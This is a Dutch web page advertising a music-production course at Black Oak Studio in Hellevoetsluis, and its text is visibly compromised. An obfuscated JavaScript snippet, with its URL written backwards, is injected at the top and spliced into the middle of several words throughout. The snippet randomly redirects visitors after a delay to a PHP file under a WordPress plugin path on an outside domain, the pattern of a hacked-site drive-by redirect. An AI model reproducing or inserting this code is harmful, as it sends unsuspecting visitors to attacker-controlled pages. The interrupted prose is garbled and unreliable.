Muziek produktie

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1503314440887{margin-bottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom: 100px !important;}”]

Muziekproductie

 

Muziekproductie voor beginners en gevorderden:

Bij de cursus muziekproductie leer je de basics die nodig zijn om thuis je eigen liedjes te kunnen opnemen en produceren. Je leert om te gaan met verschillende soorten microfoons en pre-amps, en hoe belangrijk akoestiek kan zijn voor een goede opname. Nadat je iets hebt opgenomen leer je hoe je het geluid kan bewerken op de computer in een programma genaamd Abletoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. Wat is bijvoorbeeld EQ, Compressie, Delay, Reverb en Distoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tortion? Dit alles kan jou helpen de muziek te maken waar jij trots op kan zijn.

Ook de gevorderde producer kan zich inschrijven. Daarbij leggen we vooral de focus op onder andere het verbeteren van je arrangementen of het ‘’bouwen’’ van je eigen ‘’sound’’. Werken we met externe apparatuur, en maken we onze eigen Samples. Tips als; hoe zorg je er voor dat mensen jouw nummers gaan herkennen? En heb je bijvoorbeeld weleens met echte analoge synthesizers gewerkt?

De lessen zullen plaats vinden in een professionele studio (Black Oak Studio in Hellevoetsluis) waarbij we de beschikking hebben over verschillende microfoons, pre-amps, analoge en digitale synthesizers, orgels, gitaren, gitaar versterkers, piano’s, vibrafoon en een drumstel. De lessen zullen worden verzorgd door Serge Dusault. Serge is in 2008 afgestudeerd als Toetsenist aan het Conservatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium te Rotterdam. In 2014 startte hij samen met gitarist Ingmar Spaaij de Black Oak Studio. Serge componeert en produceert onder andere muziek voor Bands, Theater, Reclames en Film.

Kortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom voor leerlingen van elk niveau is er een hoop te ontdekken, dus schrijf je in voor een korte of langere cursus en ontdek wat je allemaal zelf kan doen op het gebied van muziekproductie!

Geef bij de inschrijving aan of je ervaring hebt in het werken met muzieksoftware en of je een instrument bespeelt. De lessen zullen plaats vinden in de studio met hooguit 3 medestudenten (dus 4 leerlingen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal per groep). Voor de lessen is het hebben van een computer of laptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top wel een vereiste. Deze lessen zijn geschikt voor alle leeftijden

Top